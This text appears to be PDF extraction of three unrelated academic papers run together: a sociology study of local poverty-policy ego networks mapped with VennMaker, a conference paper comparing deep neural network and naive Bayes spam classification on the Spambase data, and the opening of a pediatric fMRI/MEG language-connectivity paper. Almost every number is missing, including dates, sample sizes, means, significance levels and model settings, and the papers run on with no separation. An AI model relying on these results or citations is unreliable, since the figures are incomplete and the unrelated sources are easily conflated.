this research is guided by asking about the cooperation of political parties, welfare agencies and the administration: how are these networks structured? what kind of different or similar actors can be found in these networks, how many of them are there and what is their function? two hypotheses serve as guidelines: first: if actors from different areas are represented in a network, heterophile networks would contain more social capi- tal. this is based on the assumption that welfare agencies and domestic associations represent poverty-stricken people, because of their institutional foundation, and are, therefore, potential contacts for politicians. consequently, their networks should be bigger and presumably denser and more heterophilic. networks can be considered homophilic if alteri (network contacts and nodes), which resemble the ego and its fea- tures, are placed in the areas where the people questioned are supposed to locate their contacts (lin, cook, & burt, ; pfenning & pfenning, , p. ). these three characteristics of networks (size, density, and homophily) will be calculated individually in this case. second: due to their function and position as representatives of the people, officials of political parties have higher brokerage values than representatives of welfare and domestic agencies. a person, who is located in a defining interface of the network, is called a broker. brokerage is comparatively operationalized via the number of subgraphs in each egonetwork (burt, ). the more subgraphs that are in an egonetwork, the higher the ego bro- kerage value. . methodology for this study, egonetworks were collected and analysed (fischer et al., ; well- man & leighton, ; crossley et al. ). because egonetworks explain rela- tions between the ego and its alteri, they reflect the individual “bounded rationality” of actors. the qualitative approach to net- works that gained attention recently (bel- lotti ; hollstein ) proved to be the best way to access the discussed field of research. benefitting from qualitative sna, a mixed methods design was real- ized based on visual network maps with targets (crossley et al. , p. ). in this case, the program vennmaker was used to collect data visually through network maps connections a visual data collection method | volume | issues & | insna.org (kahn & antonucci, ). this software allows an immediate visualization of the participant’s network during the conversa- tion. additionally, network structures can be immediately validated by repeated and clarified questions during the interview process. the emphasis, therefore, lies on the qualitative aspects of respondents’ networks. complementary, or, depending on the question, primarily, quantitative da- ta can be calculated by standardizing and structuring the network maps prior to the interview, so that results can be compared. overall, the use of vennmaker is a stand- ardized collection, in which alteri attrib- utes, for example importance, type of rela- tionship, etc., are visualized through the program and are quantitatively recorded and standardized. this visual collection method combines qualitative and quantita- tive approaches and integrates both (hollstein , p. – ). the elicitation for this research was embedded in “tradi- tional”, in-depth expert interviews (bogner, littig, & menz, ). regarding the sampling parties, welfare agencies and domestic associations at the local level in an east german city (jena) and a city in west germany (trier) were chosen. 
both cities are home to a university, are of similar size, are of a similar socio- economic structure, and have to tackle similar challenges in areas of deprivation, which is what makes them participants of the federal “social city program”. accordingly, a systematic prob- ability method was chosen to approach representative position holders in the field: the chairmen or executive directors of as- sociations and charities were interviewed and their political counterparts, the party leaders, faction leaders, or the politicians who had social policies as their main fo- cus. by then using the snowball-approach (babbie, , p. ), other central actors were included in the course of the process. the sample includes egonetworks in to- tal. for jena, the sample includes six asso- ciation representatives, party represent- atives and one city administrator. for trier, five association representatives are included, as well as nine party representa- tives and two city administrators. alto- gether, women and men between and years were represented. for four networks, not all data is available, and for three networks, interview effects can be assumed, which were conducted by anoth- er interviewer. the networks of admin- istration officials were not included, be- cause they represent a functional group of only three egos, and thus too small for an intended mean value comparison. the egonetworks were established together with the respondents using the “free net- work drawing” function of vennmaker based on targets. for the networks, alteri were collected through a name generator, in order to functionally separate the field (burt, ; campbell & lee, ). for this analysis, the question asked focused explicitly on relationships of professional information exchange: “now i am curious about the people with whom you work to- gether in the field of fighting poverty. if you could give me a specific example, for instance, who do you contact or ask for help when you administer benefits?” the generator was connected to qualitative guiding questions of the expert interview with the intention to reveal rele- vant cooperation: most of the time, partic- ipants named organisations important to them in the course of the qualitative expert interview. these organisations were noted, and the participant would be asked, with which individuals from these organisations she worked together with in the field of welfare. the named alteri were then drawn in vennmaker, together with the interview partner, in a visually-participatory manner. afterwards, the name interpreters were queried, which generated standardized in- formation regarding the alteri and their re- lations to ego. the nature of the relation- ship between the ego and its alteri is col- lected through the interpreters, as well as alter-alter relationships. interpreters, com- prised of several common measures, such as the duration of contact, frequency of contact and the type of contact, the im- portance of alteri for the ego (visualized as a visual data collection method connections insna.org | issues & | volume | the size of alteri), function, party member- ship, age and gender, were used. interpret- ers were operationalized as follows: con- tact frequency: = very often (daily, week- ly), = often (up to three months), = sel- dom (once or twice a year); duration of contact: = – years, = – years, = – years, = – years, = more than years; type of contact (personal, via phone, via mail, email, cell phone). 
the visual collection and participa- tory positioning together with the partici- pants proved to be very beneficial for both sides. at no point in time did the partici- pants feel as if they were producing the type of quantitative data, which is usually the case with questionnaires when collect- ing network data. plus, this collection pro- cedure is not as time consuming as the classic approach. this method is, therefore, especially interesting for smaller and more sensitive research fields, and leads to equally valid results. in the course of the processing of the digital network map, it became appar- ent that categorical variables, such as fre- quency of contact, age or duration of con- tact, can be collected very well through the additionally configurable ‘actors chart’ in vennmaker, which is comparable to a questionnaire, meaning these were not added visually, but via a catalogue of ques- tions that can be called upon in the pro- gram. instead, the form and formalization of cooperation was represented through re- lations, and afterwards the drawings were complemented with this information to- gether with participants. here, varying forms of relations were offered to depict multiplexity, from which the participant could select the most fitting for the present relationship in their perception (see figure ). figure : visualization example of the operational- ization source: collection, calculation and figure by the author to distinguish those multiplex rela- tionships, several forms for collaboration were drawn with one alter. more specifi- cally, these were the exchange of infor- mation and experiences (turquoise), ex- change or procurement of means (finan- cially and otherwise; blue), planning and implementation of concrete measures (pur- ple) and timely loose or sporadic (orange), as well as institutionalized and formalized cooperation (green). the alteris’ colours represent party membership in line with parties’ colours or non-partisanship (white). via three concentric circles, the accessibility of alteri was classified from “very good” to “less good” (see figure ). the sectors, meaning the circle segments in different grey shades, illustrate the areas of the municipality: political parties, city administration, agencies, charities and as- sociations, businesses, unions, media. for the quantitative analysis, the collected re- sults were controlled and processed in ex- cel through the export function of the pro- gram. afterwards, the network parameters and measures for homophily and brokerage were calculated by using ucinet; here, the calculation of density was balanced with the one from vennmaker. as a third factor, apart from size and density, ho- mophily was calculated using the ei-index. this index carries out values from − to ; connections a visual data collection method | volume | issues & | insna.org meaning heterophily and − standing for homophily: the lower the value, the more homophilic the network. in order to com- pare the networks amongst each other, in terms of their homophily, this research takes the indices of the entire network into account. finally, the comparison of mean values was calculated with a parametric test in spss. . empirical findings when looking at the network size, politi- cians have a slightly bigger network than the association representatives. the larger the network, the lower the density (borgat- ti & everett, ). for both groups, dif- ferences could be found in density rather than in size. 
a comparison of the networks of party representatives regarding the ei- index reveals that the networks show the entire spectrum of ei. for the mean value, all networks are located in the homophile field of the index, yet the networks of party representatives are more heterophilic at − . (sd = . ) than those of the as- sociation representatives at − . (sd = . ) (see table ). thus, politicians have more heterophilic networks in terms of lo- cating alteri in sectors. the mean values show that the association networks display less varied values than the ones of the poli- ticians. therefore, politicians act as infor- mation intermediaries according to the second hypothesis, which stated politicians enjoy a kind of monopoly regarding the passing of information, which is operation- alized through the number of subgraphs. table : comparison of the mean value for size, density, ei-index and subgraphs collection, calculation and figure by the author. significance level at . . the difference in the amount of subgraphs from . (parties) to on average (as- sociations) indicates that association repre- sentatives seem to have the higher broker- age power, and hypothesis two is rejected. the t-test was only relevant for the density. regarding the number of subgraphs and function, the mean value comparison was not significant (see table ). since the dif- ference of the mean values for density is accidental by up to per cent, a very low effect between density and function may the purely star-networks (no. , , , , ) were excluded here. exist. as a result, one can state that the networks of the association representatives contribute more to the inclusion of affected interests than those of the party representa- tives. contrary to this, the politicians’ net- works seem more secluded, due to their slight homogenous constitution. . conclusion the thematic aim of this contribution was to illustrate the network structure between local politicians and welfare associations in poverty politics. the networks of stud- ied egos were quantified and explicated with different variables (size, density, ho- mophily, and subgraphs). the first hypoth- esis could be partially validated, because the networks of association representatives were denser and slightly more heterophilic function size density ei-index via sector affiliation number of subgraphs party (n= ) mean . . − . . sd . . . . association (n= ) mean . . − . . sd . . . . total (n= ) mean . . − . . sd . . . . significance (n= ) t . . . . squared eta (n= ) ŋ . . . . a visual data collection method connections insna.org | issues & | volume | than those of party representatives. re- garding the second hypothesis, results show that party representatives have larger networks, yet these networks split into fewer subgraphs than the networks of as- sociation representatives. in terms of methodology, the aim was to show how digital network maps fa- cilitate collecting and analysing quantita- tive data. for this, data collection with vennmaker has proven to be very effec- tive. structures and the manifestations of relations with the associations, as well as alteri-characteristics were standardized; here, the scaling and classification of cate- gories was very time-consuming. the posi- tioning of the alteri could be singled out from vennmaker for the quantitative cal- culations presented here. insofar, it was as- sured that the shown network structure was also depicted in the quantitative data set. 
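to make the two measures behind these results concrete, the ei-index over sector affiliation and brokerage operationalized as the number of subgraphs among an ego's alters, a minimal python/networkx sketch is given below; it is illustrative only (the toy ego network and attribute names are hypothetical) and is not the authors' vennmaker/ucinet/spss workflow.

```python
import networkx as nx

def ei_index(g, attr="sector"):
    # EI = (E - I) / (E + I): +1 means all ties cross sectors (heterophily),
    # -1 means all ties stay within one sector (homophily)
    external = sum(1 for u, v in g.edges() if g.nodes[u][attr] != g.nodes[v][attr])
    internal = g.number_of_edges() - external
    total = external + internal
    return (external - internal) / total if total else 0.0

def n_subgraphs(ego_net, ego="ego"):
    # brokerage proxy: number of connected components among the alters once the
    # ego is removed (more components -> the ego bridges more subgraphs)
    alters = ego_net.copy()
    alters.remove_node(ego)
    return nx.number_connected_components(alters)

# toy ego network with alters tagged by municipal sector (hypothetical data)
g = nx.Graph()
g.add_node("ego", sector="party")
for alter, sector in [("a1", "party"), ("a2", "administration"), ("a3", "association")]:
    g.add_node(alter, sector=sector)
    g.add_edge("ego", alter)
g.add_edge("a1", "a2")

print("ei-index:", round(ei_index(g), 2))
print("subgraphs among alters:", n_subgraphs(g))
```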
sketching the networks together with the interview partners allowed a direct captur- ing of the inherent thought processes of the participants during the conversation. while this may have led, in some cases, to very confusing network maps, the fact that par- ticipants could see their networks structur- ally visualized proved to be interesting and surprising to them. this also prevented boredom or frustration from emerging dur- ing the collection of alter-alter-relations (mccarty, killworth, & rennell, ). the joint sketching caused participants to become more interested in the inquiry, and it was possible to illustrate the structure of their professional networks for them. such a combined approach is currently without equal because a simultaneous positioning of the alteri and validation of network structures on a visual network map is a clear advantage of the program, whereas the analysis for statistical calculations had to be done with other programs. conse- quently, vennmaker had an interface func- tion for the quantitative part of the study. the collection and processing of data was enabled and highly facilitated, in particu- lar, because of the program. compared to this, the processing and calculating of pa- rameters, especially the ei-index and the ttest, was elaborate and tedious in uci- net. the data collected and exported with vennmaker was further analysed, or man- ually edited in other programs. here, spss was fitting for the hypotheses tests. initial- ly, vennmaker caused the most problems in the beginning of the analysis compared to the other programs. this was mainly be- cause the software was first used as a be- taversion in the research project and later on in the . -version. these two versions already differed greatly in their usage, es- pecially the statistics functions, which were needed for a smooth export and fur- ther analysis: they were in need of further development. for the collection of network data, vennmaker has proven successful in an interview setting. as a result, the meth- od of using digital network cards is well suited for the visual-participatory collec- tion of egonetworks together with partici- pants. the possibility of sketching the network and the following revision with the participants should be emphasized as a positive feature. by proceeding this way, the interpretations of the interview partner could be directly included and analysed quantitatively afterwards. because of that, a distortion by the researcher can be mini- mized, and, almost in passing, quantitative data can be collected. it could, therefore, be demonstrated that visual collection in- struments are well suited to gather and evaluate quantitative data. references babbie, e. r. ( ). the practice of social research ( th ed.). belmont, ca: wadsworth cengage learning. bellotti, e. ( ). what are friends for?: elective communities of single people. social networks, ( ), – . doi: . /j.socnet. . . bogner, a., littig, b., & menz, w. (eds.). ( ). re- search methods series. interviewing experts. ba- singstoke [england], new york: palgrave macmil- lan. borgatti, s. p., & everett, m. g. ( ). network analysis of -mode data. social networks, ( ), – . doi: . /s - ( ) - bourdieu, p. ( ). the genesis of the concepts of habitus and field. sociocriticism, ( ), – . bourdieu, p. ( ). the forms of capital. in j. g. richardson (ed.), handbook of theory and re- connections a visual data collection method | volume | issues & | insna.org search for the sociology of education (pp. – ). new york: greenwood press. 
burt, r. s. ( ). structural holes: the social struc- ture of competition ( nd ed.). cambridge, mass.: harvard university press. burt, r. s. ( ). a note on social capital and net- work content. social networks, ( ), – . doi: . /s - ( ) - campbell, k. e., & lee, b. a. ( ). name genera- tors in surveys of personal networks. social net- works, ( ), – . doi: . / - ( ) -f coleman, j. s. ( ). social capital in the creation of human capital. the american journal of sociolo- gy, , – . crossley, n., bellotti, e., edwards, g., everett, m. g., koskinen, j. & tranmer, m. ( ). social net- work analysis for ego-nets. los angeles: sage. fischer, c. s., stueve, c., jones, l. m., jackson, r. m., gerson, k., & baldassare, m. ( ). net- works and places: social relations in the urban setting. new york: free press. gamper, m., schönhuth, m., & kronenwett, m. ( ). bringing qualitative and quantitative data together – collecting and analyzing network data with the help of the software tool vennmaker. in h. safar, m. safar, & k. a. mahdi (eds.), social networking and community behavior modeling: qualitative and quantitative measures. qualita- tive and quantitative measures. hershey: infor- mation science reference. granovetter, m. s. ( ). the strength of weak ties. american journal of sociology, ( ), – . heinze, r., & voelzkow, h. ( ). kommunalpolitik und verbände: inszenierter korporatismus auf lokaler und regionaler ebene? in h. heinelt & h. wollmann (eds.), stadtforschung aktuell: vol. . brennpunkt stadt. stadtpolitik und lokale politikforschung in den er und er jahren (pp. – ). basel: birkhäuser. helbling, m., egli, s., & matter, s. ( ). lokale eliten und kommunale politiknetzwerke - einflussreiche akteure in der einbürgerungspolitik einer schweizer gemeinde. in u. serdült (ed.): vol. nr. . zürcher politik- & evaluationsstudien, anwendungen sozialer netzwerkanalyse. beiträge zur tagung vom . und . oktober (pp. – ). zürich: institut für politikwissenschaft. forschungsbereich policy-analyse und evaluation. hollstein, b. ( ). qualitative approaches. in p. j. carrington & j. scott (eds.), the sage handbook of social network analysis (pp. – ). london: sage. hollstein, b. ( ). mixed methods social networks research: an introduction. in s. domínguez & b. hollstein (eds.), structural analysis in the social sciences: vol. . mixed methods social networks research. design and applications (pp. – ). new york: cambridge univ. press. fowler. james h. ( ). connecting the congress: a study of cosponsorship networks. political anal- ysis, ( ), – . retrieved from . /pan/mpl kahn, r. l., & antonucci, t. c. ( ). convoys of life course: attachment, roles, and social support. in p. b. baltes & o. g. brim (eds.), life-span de- velopment and behavior (pp. – ). new york: academic press. lin, n., cook, k. s., & burt, r. s. ( ). social cap- ital: theory and research. new york: aldine de gruyter. retrieved from http://www.worldcat.org/oclc/ mccarty, c., killworth, p. d., & rennell, j. ( ). impact of methods for reducing respondent burden on personal network structural measures. social networks, ( ), – . doi: . /j.socnet. . . ohm, a. ( ). die machtstruktur kommunaler entscheidungsträger - eine netzwerkanalyse. in v. schneider & f. janning (eds.), politiknetzwerke. modelle, anwendungen und visualisierungen (pp. – ). wiesbaden: vs verlag für sozialwissenschaften. petermann, s. ( ). soziale netzwerke und politischer einfluss von kommunalpolitikern. in w. matiaske & g. grözinger (eds.), sozialkapital. eine (un)bequeme kategorie (pp. – ). 
marburg: metropolis-verlag. pfenning, u., & pfenning, a. ( ). egozentrierte netzwerke: verschiedene instrumente - verschiedene ergebnisse. zuma nachrichten, ( ), – . retrieved from http://www.ssoar.info/ssoar/files/ / /zuma- nachrichten_ _ _ - .pdf wellman, b., & leighton, b. ( ). networks, neighborhoods and communities: approaches to the study of the community question. toronto: centre for urban and community studies and the dept. of sociology, university of toronto. werner, w. ( ). armut und obdachlosigkeit in der kommune. in h. wollmann & r. roth (eds.), kommunalpolitik – politisches handeln in der gemeinde ( nd ed., pp. – ). opladen: westdeutscher verlag. international conference on sensor network and computer engineering (icsnce ) research of email classification based on deep neural network wang yawen school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com yu fan a , wei yanxi b school of computer science and engineering xi’an technological university xi’an, , china e-mail: a @qq.com b @qq.com abstract—the effective distinction between normal email and spam, so as to maximize the possible of filtering spam has become a research hotspot currently. naive bayes algorithm is a kind of frequently-used email classification and it is a statistical-based classification algorithm. it assumes that the attributes are independent of each other when given the target value. this hypothesis is apparently impossible in the email classification, so the accuracy of email classification based on naive bayes algorithm is low. in allusion to the problem of poor accuracy of email classification based on naive bayes algorithm, scholars have proposed some new email classification algorithms. the email classification algorithm based on deep neural network is one kind of them. the deep neural network is an artificial neural network with full connection between layer and layer. the algorithm extracted the email feature from the training email samples and constructed a dnn with multiple hidden layers, the dnn classifier was generated by training samples, and finally the testing emails were classified, and they were marked whether they were spam or not. in order to verify the effect of the email classification algorithm based on dnn, in this paper we constructed a dnn with hidden layers. the number of nodes in each hidden layer was . when the training set was trained, we set up batches, and each batch has trained data. we used the famous spam base dataset as the data set. the experiment result showed that dnn was higher than naive bayes in the accuracy of email classification when the proportion of the training set was %, %, %, % and % respectively, and dnn showed a good classification effect. with the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. the focus of next research will be combining various algorithms to further improve the effect of email classification. keywords-deep neural networks; spam email; classification; naive bayes; spambase data set i. introduction email has become a major way of communication for people at present, but the problem of spam comes behind. the harm of spam is mainly manifested as the following aspects: occupying bandwidth, leading to the congestion of the email server and reducing the efficiency of the network; consuming the time of the user and affecting the work efficiency. 
therefore, the effective distinction between normal email and spam, so as to maximize the possibility of filtering spam, has become a research hotspot currently. the naive bayes algorithm is a frequently-used, statistics-based email classification algorithm[ - ], which has the characteristics of simple realization and fast classification. however, it assumes that the attributes are independent of each other when given the target value[ ]. this hypothesis is apparently impossible in email classification, so the accuracy of email classification based on the naive bayes algorithm is low. to address the problem of poor accuracy of email classification based on the naive bayes algorithm, scholars have proposed some new email classification algorithms. the email classification algorithm based on deep neural network (dnn) is one of them.

ii. theoretical basis

the basic concept of artificial neural networks is based on hypotheses and model construction concerning how the human brain responds to complex problems[ - ]. the deep neural network is an artificial neural network with full connection between layer and layer, and its structure is shown in figure . full connection between layer and layer means that any neuron in one layer must be connected to every neuron in the adjacent layer. although the deep neural network looks complex, viewed as a small local model it is still the same as the perceptron.

figure . structure diagram of deep neural network (input layer, hidden layers, output layer)

we use $w^l_{jk}$ to represent the weight coefficient between the $k$-th neuron in layer $l-1$ and the $j$-th neuron in layer $l$, $b^l_j$ to represent the bias of the $j$-th neuron in layer $l$, and $a^l_j$ to represent the activation value of the $j$-th neuron in layer $l$. we can get the following relationship between the activation value of a neuron in layer $l$ and the activation values of all neurons in layer $l-1$:

$$a^l_j = \sigma\Big(\sum_k w^l_{jk}\, a^{l-1}_k + b^l_j\Big)$$

we assume that $w^l$ is the weight coefficient matrix of all the neurons in layer $l$, $b^l$ is the bias vector of layer $l$, $a^l$ is the vector of activation values of layer $l$, and $z^l$ is the weighted input of all neurons in layer $l$; then $w^l_{jk}$ is the weight coefficient in row $j$, column $k$. the relationship between the activation values of layer $l$ and those of layer $l-1$ can then be expressed by the following matrix relationships:

$$z^l = w^l a^{l-1} + b^l, \qquad a^l = \sigma(z^l)$$

here $\sigma$ represents the non-linear activation function of the nodes on the hidden layers, and the traditional dnn usually uses the sigmoid function:

$$\sigma(z) = \frac{1}{1 + e^{-z}}$$

because the sigmoid function is monotonically increasing and its inverse function is also monotonically increasing, it is often used as a threshold function of neural networks; it maps its input to a value between 0 and 1. the sigmoid function curve is shown in figure .

figure . the sigmoid function curve

iii. algorithm description

the implementation process of the mail classification algorithm based on deep neural network is shown in figure .
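to make the layer-wise relationships above concrete, here is a minimal numpy sketch of the forward pass with a sigmoid activation; the layer sizes, weights and biases are made up for illustration, and this is not the implementation used in the paper.

```python
import numpy as np

def sigmoid(z):
    # maps any real input into (0, 1)
    return 1.0 / (1.0 + np.exp(-z))

def forward(a, weights, biases):
    # weights[l] has shape (n_l, n_{l-1}); biases[l] has shape (n_l,)
    # each layer computes z = W a + b and then a = sigmoid(z)
    for w, b in zip(weights, biases):
        z = w @ a + b
        a = sigmoid(z)
    return a

# tiny example: 3 inputs -> one hidden layer of 4 nodes -> 2 outputs
rng = np.random.default_rng(0)
weights = [rng.normal(size=(4, 3)), rng.normal(size=(2, 4))]
biases = [np.zeros(4), np.zeros(2)]
print(forward(np.array([0.5, -1.0, 2.0]), weights, biases))
```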
figure . algorithm execution process (flowchart of steps 1-6 below: begin; extract training features; construct and train the dnn classifier; extract testing features; classify the testing email; compare predictions with the actual tags; end)

step 1: read the contents of the email for training from the spambase data set and extract the email features for training, such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on.

step 2: construct a dnn containing multiple hidden layers; set the number of hidden layers (n_classes), set the number of nodes on each layer (hidden_units), set the training batches (steps) and the number of training data for each batch (batch_size).

step 3: train the dnn to generate the dnn classifier.

step 4: read the contents of the email for testing from the spambase data set and extract the email features for testing, such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on.

step 5: use the dnn classifier to classify the testing email and mark whether they are spam ( or ).

step 6: compare the classification result of the email (y_predict) with the actual tag (y_test), calculate the accuracy of the algorithm in the email classification (accuracy_score) and verify the correctness of the algorithm.

iv. experimental results and analysis

in order to verify the effect of the email classification algorithm based on dnn, in this paper we constructed a dnn with hidden layers. the number of nodes in each hidden layer was . when the training set was trained, we set up batches, and each batch has trained data. we used the famous spambase data set, which is from the uci machine learning repository at the university of california, usa. the specific situation is shown in table i. we compared the two email filtering algorithms, dnn and naive bayes, on accuracy, which is the main evaluation standard of email filtering technology. the accuracy is defined as follows:

$$\text{accuracy} = \frac{\text{number of correctly identified emails}}{\text{total number of emails}}$$

we did five groups of experiments in this paper. the selection case of training set and testing set in each experiment is shown in table ii.

table i. spambase data set (indices reported: total number of emails; number of attributes; number of email category labels; email categories (valid email, spam email); number and proportion of spam email; number and proportion of valid email)

table ii. the selection case of training set and testing set (columns: group number; the proportion of the training set in all data; the number of emails in the training set; the proportion of the testing set in all data; the number of emails in the testing set)

the experimental results are shown in figure .
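before the results, here is a hedged end-to-end sketch of steps 1-6 using scikit-learn on the uci spambase data. the file path, split ratio, hidden-layer sizes and batch size below are illustrative placeholders (the paper's exact settings are not reproduced), and sklearn's mlpclassifier stands in for the dnn classifier described above.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score

# steps 1/4: load spambase; each row is the word/character-frequency and
# capital-run-length features plus a spam label (hypothetical local path)
data = np.loadtxt("spambase.data", delimiter=",")
x, y = data[:, :-1], data[:, -1]
x_train, x_test, y_train, y_test = train_test_split(
    x, y, train_size=0.7, random_state=0)            # e.g., a 70/30 split

# steps 2-3: construct and train a fully connected network with sigmoid units
clf = MLPClassifier(hidden_layer_sizes=(100, 100, 100),
                    activation="logistic", batch_size=200, max_iter=500)
clf.fit(x_train, y_train)

# steps 5-6: classify the testing email and compare with the actual tags
y_predict = clf.predict(x_test)
print("accuracy:", accuracy_score(y_test, y_predict))
```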
the comparison of accuracy of the two algorithms the experiment result showed that dnn was higher than naive bayes in the accuracy of email classification when the proportion of the training set was %, %, %, % and % respectively, and dnn showed a good classification effect. v. conclusion the application of email classification algorithm based on deep neural network is studied in this paper. the algorithm constructed multiple hidden layers and generated dnn classifiers through training. the experiment results showed that the accuracy of the algorithm is obviously higher than the naive bayes algorithm. with the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. the focus of next research will becombining various algorithms to further improve the effect of email classification. acknowledgments new network and detection control national joint engineering laboratory fund program (gsysj ). xi’an technological university principal scientific research fund project: xagdxjj- international conference on sensor network and computer engineering (icsnce ) reference [ ] cao cuiling, wang yuanyuan and yuan ye, “research of a spam filter based on improved naive bayes algorithm, ”chinese journal of network and information security, vol. no. , pp. - , march . [ ] wang zhiyong and liu hongmei, “design and implementation of bayesian spam filte R ing system,” journal of inner mongolia agricultural university(natural science edition), vol. no. , pp. - , may. . [ ] wang qingsong and wei ruyu, “bayesian chinese spam filtering method based on phrases,” computer science, vol. no. , pp. - , apr . [ ] neural networks and deep learning [eb/ol]. http://neuralnetworksanddeeplearning.com. [ ] li kun, chai yumei and zhao hongling, “estimation of fetal weight based on deep neural network,” computer science, vol. no. a, pp. - , nov . [ ] cao meng, li hongyan and zhao rongrong, “a pitch detection method based on deep neuralnetwork,” microelectronics & computer, vo . no. , pp. - , june . [ ] ren rongrong, zhou mingquan and geng guohua, “the multi-scale features extraction method based on deep neural network”, journal of northwest university(natural science edition), vol. no. , pp. - , apr . [ ] s.l.zhang research on deep neural networks based models for speech recognition(ph.d., university of science and technology of china, china ), p. brain- - -ver -kadis_ p .. characterizing information flux within the distributed pediatric expressive language network: a core region mapped through fmri-constrained meg effective connectivity analyses darren s. kadis, – andrew dimitrijevic, – claudio a. toro-serey, mary lou smith, , and scott k. holland , , , abstract using noninvasive neuroimaging, researchers have shown that young children have bilateral and diffuse language networks, which become increasingly left lateralized and focal with development. connectivity within the distributed pediatric language network has been minimally studied, and conventional neuroimaging approaches do not distinguish task-related signal changes from those that are task essential. in this study, we propose a novel multimodal method to map core language sites from patterns of information flux. we retrospectively analyze neuroimaging data collected in two groups of children, ages – years, performing verb generation in functional magnetic resonance imaging (fmri) (n = ) and magnetoencephalography (meg) (n = ). 
the fmri data were conventionally analyzed and the group activation map parcellated to define node locations. neuronal activity at each node was estimated from meg data using a linearly constrained minimum variance beamformer, and effective connectivity within canonical frequency bands was computed using the phase slope index metric. we observed significant ( p £ . ) effective connections in all subjects. the number of suprathreshold connections was significantly and linearly correlated with participant’s age (r = . , n = , p £ . ), suggesting that core language sites emerge as part of the normal developmental trajec- tory. across frequencies, we observed significant effective connectivity among proximal left frontal nodes. within the low frequency bands, information flux was rostrally directed within a focal, left frontal region, approximating broca’s area. at higher frequencies, we observed increased connectivity involving bilateral perisylvian nodes. frequency- specific differences in patterns of information flux were resolved through fast (i.e., meg) neuroimaging. key words: broca’s area; causal network; children; functional magnetic resonance imaging; linearly constrained minimum variance beamformer; magnetoencephalography; multimodal; parcellation; phase slope index introduction normal developmental changes in gross languagerepresentation have been well characterized using noninvasive neuroimaging. with functional magnetic res- onance imaging (fmri), and more recently, magnetoen- cephalography ( meg), researchers have shown that healthy young children have bilateral and diffuse lan- guage networks, which become increasingly left later- alized and focal with development (brown et al., ; holland et al., ; kadis et al., ; ressel et al., ). pediatric neuroimaging research consortium, cincinnati children’s hospital medical center, cincinnati, ohio. division of neurology, cincinnati children’s hospital medical center, cincinnati, ohio. department of pediatrics, college of medicine, university of cincinnati, cincinnati, ohio. communication sciences research center, cincinnati children’s hospital medical center, cincinnati, ohio. division of pediatric otolaryngology, cincinnati children’s hospital medical center, cincinnati, ohio. department of surgery, college of medicine, university of cincinnati, cincinnati, ohio. department of psychology, university of toronto, toronto, ontario, canada. department of psychology, hospital for sick children, toronto, ontario, canada. division of radiology, cincinnati children’s hospital medical center, cincinnati, ohio. ª darren s. kadis, et al., ; published by mary ann liebert, inc. this open access article is distributed under the terms of the creative commons attribution noncommercial license (http://creativecommons.org/licenses/by-nc/ . /) which permits any noncommercial use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited. brain connectivity volume , number , mary ann liebert, inc. doi: . /brain. . an early distributed network is thought to confer a pediat- ric advantage in the event of cerebral insult. adults with left perisylvian injury tend to develop severe and lasting apha- sias, whereas young children with comparable insults experi- ence minimal language disturbance and develop essentially normal language through childhood and adolescence (bal- lantyne et al., ; bates et al., ; reilly et al., ; vargha-khadem et al., ; see also, jacola et al., ; tillema et al., ). 
sparing of language is realized through functional engagement of the extracanonical cortex. the po- tential for both interhemispheric and intrahemispheric plas- ticity (i.e., establishment of an atypical language network) decreases with age, and relatively poor outcomes and failure to form atypical networks are seen with insults occurring after about age or years (branch et al., ; brazdil et al., ; helmstaedter et al., ; kadis et al., , ; rasmussen and milner, ; saltzman-benaiah et al., ; satz et al., ). normal developmental changes in language representation provide a compelling context in which the potential for ef- fective plasticity would be expected to decrease with age. however, the timing for establishment of adult-typical repre- sentation does not perfectly track with the clinical outcome data. in fmri, mature left lateralization and focalization of the bold activity is protracted in the developmental period, with adult-typical representation emerging in adolescence or young adulthood (e.g., szaflarski et al., ). similarly, in meg language studies, dipoles fit to average waveforms and signature oscillatory activity tend to left lateralize and focalize in the teen years (gummadavelli et al., ; kadis et al., , ; ressel et al., ). the discord suggests that conven- tional neuroimaging approaches to language mapping fail to distinguish task-correlated hemodynamic or neuronal activity from that which is task essential (i.e., necessary and sufficient for task completion). the result is relatively broad ‘‘activa- tion’’ maps for childhood function, which fail to delineate the core regions necessary for task completion. recent developments in neuroimaging technology, and particularly the high temporal resolution afforded by meg, permit assessment of neuronal population dynamics, includ- ing characterization of transient activity and estimation of causal networks. in this study, we seek to estimate informa- tion flux (directional or effective connectivity) within the distributed pediatric expressive language network. we report on findings from two groups of children completing verb generation tasks in fmri and meg. large-scale fmri data are used to provide a spatial template of task-related activa- tion. the group activation map is then segmented using a -unit random parcellation scheme (craddock et al., ), with parcel centroids used to define network node lo- cations. the neuromagnetic activity at each node is estimated from meg recordings using a beamformer, and the time courses are subjected to effective connectivity analyses using the phase slope index (psi) metric recently introduced by nolte and associates ( ). unlike many other electro- physiological metrics of effective connectivity, psi remains insensitive to mixing/volume conduction, providing robust estimates of information flux between both proximal and dis- tal node pairs. the pipeline capitalizes on the relative strengths of fmri and meg (spatial and temporal resolution, respectively) and is sensitive to the regional dynamics that is known to underlie all higher cognitive processes. method we analyze fmri and meg data that were collected for two separate studies investigating developmental changes in language representation. the participants, tasks, and data acquisition have been documented previously (holland et al., ; kadis et al., ; see also, kadis et al., ; karunanayaka et al., , ; pang et al., ) and are described only briefly below. 
